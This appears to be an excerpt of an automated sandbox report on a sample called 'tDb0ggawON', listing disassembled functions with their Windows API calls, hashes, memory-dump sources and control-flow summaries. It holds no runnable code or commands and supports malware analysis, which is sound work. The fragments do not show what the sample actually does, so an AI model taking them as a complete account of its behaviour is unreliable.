• API String ID: 544645111-0
• Opcode ID: bc3549eaa8a8489cd0fb4989aa7f79fd109a4a436851f9574842bc0ef6fdacf2
• Instruction ID: 282c00bd21db3102fbaf7e35f9ff6a9fa401e42785c1db7d156e37848ea8d8c1
• Opcode Fuzzy Hash: bc3549eaa8a8489cd0fb4989aa7f79fd109a4a436851f9574842bc0ef6fdacf2
• Instruction Fuzzy Hash: 6F31B8B9D042589FCB10CFA9D880ADEFBF0AB09314F24902AE814B7310D374A946CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 9cae66de51f82227cab782211fd69a06e8f369caa90b690adfbc9470832fea32
• Instruction ID: 34764978e390675fbd37b13477d236a6be2c43d408cc5dcbd2ef4debb7f5f5f3
• Opcode Fuzzy Hash: 9cae66de51f82227cab782211fd69a06e8f369caa90b690adfbc9470832fea32
• Instruction Fuzzy Hash: BE4177B8D052589FCB10CFE9D884ADEFBF5BB49314F14942AE928B7210D374A945CF94
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: c5f0d1d6594a26818d7cd0cb0d9f2d5d5ca0441fb2c8afe4761df39ee65f88e9
                                                                                                                                                    • Instruction ID: b3b7a3a328d4e24e1ad943f95aefa10b0fafed8a690fd89a64ae7ced77357a3a
                                                                                                                                                    • Opcode Fuzzy Hash: c5f0d1d6594a26818d7cd0cb0d9f2d5d5ca0441fb2c8afe4761df39ee65f88e9
                                                                                                                                                    • Instruction Fuzzy Hash: BB4178B9D042589FCB10CFA9D884ADEFBF5BB59324F14942AE824B7210D374A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 017F7F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: c5a2d32b1dfb5ef7bff3beb7a9d48a9c518310a4fbcaaacac4f3c0a9990871a2
                                                                                                                                                    • Instruction ID: 4cd2b44fc444c617c60302d34493cefb20ec867468c1b682300f741fb99e20ba
                                                                                                                                                    • Opcode Fuzzy Hash: c5a2d32b1dfb5ef7bff3beb7a9d48a9c518310a4fbcaaacac4f3c0a9990871a2
                                                                                                                                                    • Instruction Fuzzy Hash: CB3197B9D042589FCB14CFA9D884ADEFBF4BB19314F24902AE814B7310D774A945CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09F177E3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: a8c08104d059bb3f5029826b705d0a2a1b617d6d23554175d75677eb7eb0cea3
                                                                                                                                                    • Instruction ID: a33d34bd198af52234c946a556146fd70bf320ddda23ca0558c0498290a6dfaf
                                                                                                                                                    • Opcode Fuzzy Hash: a8c08104d059bb3f5029826b705d0a2a1b617d6d23554175d75677eb7eb0cea3
                                                                                                                                                    • Instruction Fuzzy Hash: 0D31AAB9D002589FCF10CFA9E984ADEFBF0AB59310F24901AE818B7310D775A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09F177E3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: c5d988f7db59f0ce6028482b2a0860e234f7e52731edd17185acf2aea439de4d
                                                                                                                                                    • Instruction ID: f8ffc34b406905b1ab5a3fb647474d2006129afa7145d852fae26093364d86f2
                                                                                                                                                    • Opcode Fuzzy Hash: c5d988f7db59f0ce6028482b2a0860e234f7e52731edd17185acf2aea439de4d
                                                                                                                                                    • Instruction Fuzzy Hash: 053179B9D002589FCB10CFA9D984ADEFBF4AB19310F24941AE828B7310D775A945CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 7deea8803d1f2f31ca00649ff13ff5a704757cb01d7bae9569937402424b14be
                                                                                                                                                    • Instruction ID: c5d3bf7725b5b2c0d49f8e881f85218ec6a58cff5938a219220cd0b3e08b04cc
                                                                                                                                                    • Opcode Fuzzy Hash: 7deea8803d1f2f31ca00649ff13ff5a704757cb01d7bae9569937402424b14be
                                                                                                                                                    • Instruction Fuzzy Hash: 34318AB4D002599FCB14CFA9D984ADEFBF5AB49314F14906AE814B7310D374A945CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
                                                                                                                                                      • Part of subcall function 05A484D0: LoadLibraryExW.KERNELBASE(?,?,?), ref: 05A49742
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4133054770-0
                                                                                                                                                    • Opcode ID: f9133bae8ee9e1613d54271470395bdb9eb477bae52a9e2281baa07971865eee
                                                                                                                                                    • Instruction ID: c2c9563912bd0309ec84e38ae8386d98cdf55de11dab7807ee44e4028c9c7e99
                                                                                                                                                    • Opcode Fuzzy Hash: f9133bae8ee9e1613d54271470395bdb9eb477bae52a9e2281baa07971865eee
                                                                                                                                                    • Instruction Fuzzy Hash: 3B118C31E042099FDB14DFEAE844AEFF7B9ABC9214F14806AD915F7241CA7898058FA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: [a(6$eW)$eW)$hqr
                                                                                                                                                    • API String ID: 0-2027486457
                                                                                                                                                    • Opcode ID: 67473e6bec981a0b3069c5fb915366ba01342708c1ec8e6a589f9a9e13d796e6
                                                                                                                                                    • Instruction ID: 78c576435f2cd61c7f889fbe12179f2c2438c054b5a7aae220ca0a3c2fec44f7
                                                                                                                                                    • Opcode Fuzzy Hash: 67473e6bec981a0b3069c5fb915366ba01342708c1ec8e6a589f9a9e13d796e6
                                                                                                                                                    • Instruction Fuzzy Hash: 91610F74E15209CBCB04CFA9D9809EEFBF2FF89210F24946AD515BB324D334AA018F59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: vdu$vdu$vdu
                                                                                                                                                    • API String ID: 0-2517124486
                                                                                                                                                    • Opcode ID: d3471855f618862f59479aed6214da33c15db7b7c6f5c34094b9a5fe8e262748
                                                                                                                                                    • Instruction ID: 69258e5300818ec77ffe07463738858436257b14c519c7aaac2588b61ac6d50d
                                                                                                                                                    • Opcode Fuzzy Hash: d3471855f618862f59479aed6214da33c15db7b7c6f5c34094b9a5fe8e262748
                                                                                                                                                    • Instruction Fuzzy Hash: 8671C2B4E0024ADFCB04CFA9C5809AFFBB2FF48210F14955AD516A7305D334AA86CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: vdu$vdu$vdu
                                                                                                                                                    • API String ID: 0-2517124486
                                                                                                                                                    • Opcode ID: 7f925a4ff49cc05919ae3ea047d4579cc479d902a68cadc36b3f3b1ba2511d49
                                                                                                                                                    • Instruction ID: b48d52e5a11d6f58aad5986ed1c2a615191217dadc9d7d02bc6bc7bbc4a0d870
                                                                                                                                                    • Opcode Fuzzy Hash: 7f925a4ff49cc05919ae3ea047d4579cc479d902a68cadc36b3f3b1ba2511d49
                                                                                                                                                    • Instruction Fuzzy Hash: BB61D174E0420ADFCB04CFA9C5809AFFBB2BF88210F18855AD516A7305D334AA82CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 011dcdbfbb40aa366b8bf2e0c5b52c4d17718910c2619db4adf8c912e43c02b7
                                                                                                                                                    • Instruction ID: cfb4d40917a4a9fc0af614a88ce0e070094acdcf5b0cce006a1d05f582376dc1
                                                                                                                                                    • Opcode Fuzzy Hash: 011dcdbfbb40aa366b8bf2e0c5b52c4d17718910c2619db4adf8c912e43c02b7
                                                                                                                                                    • Instruction Fuzzy Hash: 57811234A15219CFCB04CFA9D5849AEFBF2FF89310F1495AAE515AB324D330AA42CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 984e0cac20e149c85871cf33502d290cda34e32c3738a497d9b80834ef5f7983
                                                                                                                                                    • Instruction ID: 2a82b8fdf671e632afeacfd763e64f4de54c5e9a9d0b5b8d9aacb4794d45131a
                                                                                                                                                    • Opcode Fuzzy Hash: 984e0cac20e149c85871cf33502d290cda34e32c3738a497d9b80834ef5f7983
                                                                                                                                                    • Instruction Fuzzy Hash: 2551E4B0E1520ADBCB04CFAAC5855AEFBF2AF89350F24946AC615FB314D7349A418F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f367ad363fd41b7d2790e3e9afb0f5fbaa039a32df33c9faf22b86e23fc1f09b
                                                                                                                                                    • Instruction ID: b936f7d7345dce69313ddfc02ba1c8023f1c3f6c3ba18d0ab0e782f47adcc13c
                                                                                                                                                    • Opcode Fuzzy Hash: f367ad363fd41b7d2790e3e9afb0f5fbaa039a32df33c9faf22b86e23fc1f09b
                                                                                                                                                    • Instruction Fuzzy Hash: 5F51F2B0E1520A9FCB44CFAAC5855AEFBF2AF89350F24C46AC515E7314E3349A41CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c4ab4ca827d673fc58434e2c3e525a01cca0d268812bdccaf03428a3c756157c
                                                                                                                                                    • Instruction ID: 114b3b396b312284a7e5e2632f8fadec8c8bd059467b407682cc79fbc8c93460
                                                                                                                                                    • Opcode Fuzzy Hash: c4ab4ca827d673fc58434e2c3e525a01cca0d268812bdccaf03428a3c756157c
                                                                                                                                                    • Instruction Fuzzy Hash: 4A512A70E156188FDB19CF69D981A9EFBB2FF88310F1090A9D909A7364DB309A41CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80d76c465e8dc80beab94ca044b11f0d44404442c079ae8d365c0cec34157abb
                                                                                                                                                    • Instruction ID: 84fdbbf3fea5967c1e884e5ef77aa9fbce9453db6c83f1d38100a0280c1d8689
                                                                                                                                                    • Opcode Fuzzy Hash: 80d76c465e8dc80beab94ca044b11f0d44404442c079ae8d365c0cec34157abb
                                                                                                                                                    • Instruction Fuzzy Hash: 5D414770E046599BCB04CFA9C8845EEFBF2BF89320F28D699D525A7315D7309941CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b37adfa1cf423fb2d44591a18318492a9e9462eed2d8054ce96dbe4d911a6d86
                                                                                                                                                    • Instruction ID: a18d667d679fc225f627d85fc63233af1ce65fd722705ba85c3e8fc407b0e154
                                                                                                                                                    • Opcode Fuzzy Hash: b37adfa1cf423fb2d44591a18318492a9e9462eed2d8054ce96dbe4d911a6d86
                                                                                                                                                    • Instruction Fuzzy Hash: C6412971E11658CBEB68CF6B9D4469EFAF3BFC9300F14C1BA850DA6218DB701A958F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 043b5cfe55d5b2a02e528cf9b91770789c954882e3a2658e47576f52e7acc6b0
                                                                                                                                                    • Instruction ID: 7bcf335a91d767e824d776365bc235959eec3960476efc39cc31bb7454f63585
                                                                                                                                                    • Opcode Fuzzy Hash: 043b5cfe55d5b2a02e528cf9b91770789c954882e3a2658e47576f52e7acc6b0
                                                                                                                                                    • Instruction Fuzzy Hash: CB414DB1E016588BDB68CF6B9D4429EFBF3BFC9300F14C1BA854DA6265DB301A458F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:16.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 13549 78c72f0 13550 78c730e 13549->13550 13553 78c56dc 13550->13553 13552 78c7345 13554 78c8e10 LoadLibraryA 13553->13554 13556 78c8eec 13554->13556
Memory Dump Source
• Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3ea6c49d970e16bbe531404887090e88ca2071cbaf3acf6d8d41e570952200d
• Instruction ID: cae09d9e015a2e1f8dab651920429e6c2986c080df3fa29ff21e248707172ba4
• Opcode Fuzzy Hash: f3ea6c49d970e16bbe531404887090e88ca2071cbaf3acf6d8d41e570952200d
• Instruction Fuzzy Hash: 5F515570D06268CFDB25DFA4C958BEDBBB1AF49210F1480EAC409BB2A1DB354A85CF55
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks (address range -> successor blocks); the block 78c8ea0-78c8eea contains the LoadLibraryA call:
• 78c8e04-78c8e67 -> 78c8e69-78c8e73, 78c8ea0-78c8eea
• 78c8e69-78c8e73 -> 78c8ea0-78c8eea, 78c8e75-78c8e77
• 78c8e75-78c8e77 -> 78c8e79-78c8e83, 78c8e9a-78c8e9d
• 78c8e79-78c8e83 -> 78c8e85, 78c8e87-78c8e96
• 78c8e85 -> 78c8e87-78c8e96
• 78c8e87-78c8e96 -> 78c8e87-78c8e96 (loop), 78c8e98
• 78c8e98 -> 78c8e9a-78c8e9d
• 78c8e9a-78c8e9d -> 78c8ea0-78c8eea
• 78c8ea0-78c8eea (LoadLibraryA) -> 78c8eec-78c8ef2, 78c8ef3-78c8f24
• 78c8eec-78c8ef2 -> 78c8ef3-78c8f24
• 78c8ef3-78c8f24 -> 78c8f34, 78c8f26-78c8f2a
• 78c8f26-78c8f2a -> 78c8f34, 78c8f2c
• 78c8f2c -> 78c8f34
• 78c8f34 -> 78c8f35
• 78c8f35 -> 78c8f35 (loop)
APIs
• LoadLibraryA.KERNELBASE(?), ref: 078C8EDA
Memory Dump Source
• Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 5a256a213826d9209d8cddac5657609cbbff08b404b29c8eed3e14fc7058529a
• Instruction ID: 049d5bbfb3987bbdc697ad145da6c828bf77a72dd5d94e94f77b30627ff860a7
• Opcode Fuzzy Hash: 5a256a213826d9209d8cddac5657609cbbff08b404b29c8eed3e14fc7058529a
• Instruction Fuzzy Hash: 043132B0D102598FDB14CFA9C8887DEBBB6AB18314F14852DE815EB340D7789845CF96
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks (address range -> successor blocks); the entry block 78c56dc-78c8e67 leads into the same LoadLibraryA routine as the previous graph:
• 78c56dc-78c8e67 -> 78c8e69-78c8e73, 78c8ea0-78c8eea
• 78c8e69-78c8e73 -> 78c8ea0-78c8eea, 78c8e75-78c8e77
• 78c8e75-78c8e77 -> 78c8e79-78c8e83, 78c8e9a-78c8e9d
• 78c8e79-78c8e83 -> 78c8e85, 78c8e87-78c8e96
• 78c8e85 -> 78c8e87-78c8e96
• 78c8e87-78c8e96 -> 78c8e87-78c8e96 (loop), 78c8e98
• 78c8e98 -> 78c8e9a-78c8e9d
• 78c8e9a-78c8e9d -> 78c8ea0-78c8eea
• 78c8ea0-78c8eea (LoadLibraryA) -> 78c8eec-78c8ef2, 78c8ef3-78c8f24
• 78c8eec-78c8ef2 -> 78c8ef3-78c8f24
• 78c8ef3-78c8f24 -> 78c8f34, 78c8f26-78c8f2a
• 78c8f26-78c8f2a -> 78c8f34, 78c8f2c
• 78c8f2c -> 78c8f34
• 78c8f34 -> 78c8f35
• 78c8f35 -> 78c8f35 (loop)
APIs
• LoadLibraryA.KERNELBASE(?), ref: 078C8EDA
Memory Dump Source
• Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 3e3e4df977ac10fbb893a8bc5e211f717949a86a31aa59865250ea36cdbcd1b1
• Instruction ID: 6dbed32e5b09b99fbf6be08f3ef8b15f09b0e25183301bfbfeaf87e04035a929
• Opcode Fuzzy Hash: 3e3e4df977ac10fbb893a8bc5e211f717949a86a31aa59865250ea36cdbcd1b1
• Instruction Fuzzy Hash: AD3143B0D10249CFDB14CFA8C88479EBBF6AB19314F14852DE815E7340D7789845CF95
Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 3209 8260040-8260068 3210 826006f-82600a6 3209->3210 3211 826006a 3209->3211 3272 82600a8 call 78c2ab8 3210->3272 3273 82600a8 call 78c2a9b 3210->3273 3211->3210 3213 82600ad-82600bb 3214 82600c1-82600f7 3213->3214 3215 82604d8-82604e1 3213->3215 3217 82601f4-826022a 3214->3217 3218 82600fd-826015d 3214->3218 3221 8260232-8260423 3217->3221 3222 826022c-826022d 3217->3222 3232 82601c2-82601ef 3218->3232 3233 826015f-82601c1 3218->3233 3263 8260425-8260438 3221->3263 3264 826043a-8260448 3221->3264 3224 82604d7 3222->3224 3224->3215 3232->3224 3233->3232 3265 826044b-82604e1 3263->3265 3264->3265 3272->3213 3273->3213
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c21840547fbb1b2b91f44267ee1d96c544dff4f0e3fd5840092039a57fa8ab35
                                                                                                                                                    • Instruction ID: ccd22d790656739fbc818205e71a4807057b5e427a5699d58c494016e4ba51ea
                                                                                                                                                    • Opcode Fuzzy Hash: c21840547fbb1b2b91f44267ee1d96c544dff4f0e3fd5840092039a57fa8ab35
                                                                                                                                                    • Instruction Fuzzy Hash: 01D1B174E01228CFDB24DFA4C994BADBBB2BF49304F1485AAC409AB350DB359D86CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 38c652d6aab2630c91073a26db7583164899481e6ee687fbe88b60ec45d30c61
                                                                                                                                                    • Instruction ID: 05ef41cb7de6a04dc54de8928c3c6b17d8986adf7c5de87bcd4b98d9e8e08a92
                                                                                                                                                    • Opcode Fuzzy Hash: 38c652d6aab2630c91073a26db7583164899481e6ee687fbe88b60ec45d30c61
                                                                                                                                                    • Instruction Fuzzy Hash: C141AC34E102199FDB08DFA9D984AADBBB2BF49311F149069E405BB360CB34A945DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ca32955ff00804f6e60e4e8490bc4931c01246ea2f80274fe98b94d3df3f2465
                                                                                                                                                    • Instruction ID: e192713b5914a08403a30f0c12c9b3566c1421318dedb5ea9f4e5e7754d33f38
                                                                                                                                                    • Opcode Fuzzy Hash: ca32955ff00804f6e60e4e8490bc4931c01246ea2f80274fe98b94d3df3f2465
                                                                                                                                                    • Instruction Fuzzy Hash: C4419038E11219DFCB08DFA9D984AADBBB2BF49315F149069E405BB360CB34AD41DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bc2063255c2830879fc16065b225e98ed773fffa106b952b86eb7dfe77959794
